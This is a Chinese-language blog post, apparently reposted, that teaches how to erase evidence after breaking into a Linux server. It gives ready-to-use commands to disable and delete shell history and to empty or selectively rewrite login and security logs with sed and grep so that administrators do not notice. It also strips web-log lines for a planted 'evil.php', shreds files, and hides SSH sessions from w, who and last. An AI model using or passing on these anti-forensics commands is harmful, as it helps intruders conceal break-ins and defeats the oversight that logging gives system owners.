當前位置：首頁 > 运维知识 > linux >内容正文

linux

Linux清理入侵痕迹

發布時間：2023/12/18 linux 30 豆豆

生活随笔收集整理的這篇文章主要介紹了 Linux清理入侵痕迹小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、清除history歷史命令記錄

方式一：

(1)編輯history記錄文件，刪除部分不想被保存的歷史命令。

vim ~/.bash_history

(2)清除當前用戶的history命令記錄

history -c

方式二：

(1)利用vim特性刪除歷史命令

#使用vim打開一個文件 vi test.txt# 設置vim不記錄命令，Vim會將命令歷史記錄，保存在viminfo文件中。 :set history=0
# 用vim的分屏功能打開命令記錄文件.bash_history，編輯文件刪除歷史操作命令 vsp ~/.bash_history # 清除保存.bash_history文件即可。

?(2)在vim中執行自己不想讓別人看到的命令

:set history=0 :!command

方式三：

通過修改配置文件/etc/profile，使系統不再保存命令記錄。

HISTSIZE=0

方式四：

登錄后執行下面命令,不記錄歷史命令(.bash_history)

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

?二、清除系統日志痕跡

Linux 系統存在多種日志文件，來記錄系統運行過程中產生的日志。

/var/log/btmp 記錄所有登錄失敗信息，使用lastb命令查看 /var/log/lastlog 記錄系統中所有用戶最后一次登錄時間的日志，使用lastlog命令查看 /var/log/wtmp 記錄所有用戶的登錄、注銷信息，使用last命令查看 /var/log/utmp 記錄當前已經登錄的用戶信息，使用w,who,users等命令查看 /var/log/secure 記錄與安全相關的日志信息 /var/log/message 記錄系統啟動后的信息和錯誤日志

第一種方式：清空日志文件

清除登錄系統失敗的記錄：

# echo > /var/log/btmp # lastb //查詢不到登錄失敗信息

清除登錄系統成功的記錄：

# echo > /var/log/wtmp # last //查詢不到登錄成功的信息

清除相關日志信息：

清除用戶最后一次登錄時間：echo > /var/log/lastlog #lastlog命令清除當前登錄用戶的信息：echo > /var/log/utmp #使用w,who,users等命令清除安全日志記錄：cat /dev/null > /var/log/secure 清除系統日志記錄：cat /dev/null > /var/log/message

第二種方式：刪除/替換部分日志

日志文件全部被清空，太容易被管理員察覺了，如果只是刪除或替換部分關鍵日志信息，那么就可以完美隱藏攻擊痕跡。

# 刪除所有匹配到字符串的行,比如以當天日期或者自己的登錄ip sed -i '/自己的ip/'d /var/log/messages# 全局替換登錄IP地址： sed -i 's/192.168.166.85/192.168.1.1/g' secure

三、清除web入侵痕跡

第一種方式：直接替換日志ip地址

sed -i 's/192.168.166.85/192.168.1.1/g' access.log

第二種方式：清除部分相關日志

# 使用grep -v來把我們的相關信息刪除, cat /var/log/nginx/access.log | grep -v evil.php > tmp.log# 把修改過的日志覆蓋到原日志文件 cat tmp.log > /var/log/nginx/access.log/

?四、文件安全刪除工具

(1)shred命令

實現安全的從硬盤上擦除數據，默認覆蓋3次，通過 -n指定數據覆蓋次數。

# shred -f -u -z -v -n 8 1.txt shred: 1.txt: pass 1/9 (random)... shred: 1.txt: pass 2/9 (ffffff)... shred: 1.txt: pass 3/9 (aaaaaa)... shred: 1.txt: pass 4/9 (random)... shred: 1.txt: pass 5/9 (000000)... shred: 1.txt: pass 6/9 (random)... shred: 1.txt: pass 7/9 (555555)... shred: 1.txt: pass 8/9 (random)... shred: 1.txt: pass 9/9 (000000)... shred: 1.txt: removing shred: 1.txt: renamed to 00000 shred: 00000: renamed to 0000 shred: 0000: renamed to 000 shred: 000: renamed to 00 shred: 00: renamed to 0 shred: 1.txt: removed

(2)dd命令

可用于安全地清除硬盤或者分區的內容。

dd if=/dev/zero of=要刪除的文件 bs=大小 count=寫入的次數

(3)wipe

Wipe 使用特殊的模式來重復地寫文件，從磁性介質中安全擦除文件。

wipe filename

(4)Secure-Delete

Secure-Delete 是一組工具集合，提供srm、smem、sfill、sswap，4個安全刪除文件的命令行工具。

srm filename sfill filename sswap /dev/sda1 smem

五、隱藏遠程SSH登陸記錄

隱身登錄系統，不會被w、who、last等指令檢測到。

ssh -T root@192.168.0.1 /bin/bash -i

不記錄ssh公鑰在本地.ssh目錄中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

總結

以上是生活随笔為你收集整理的Linux清理入侵痕迹的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

linux
痕迹

上一篇：以《简单易懂》的语言带你搞懂无监督学习算
下一篇： tftp服务器怎么开启linux,Cen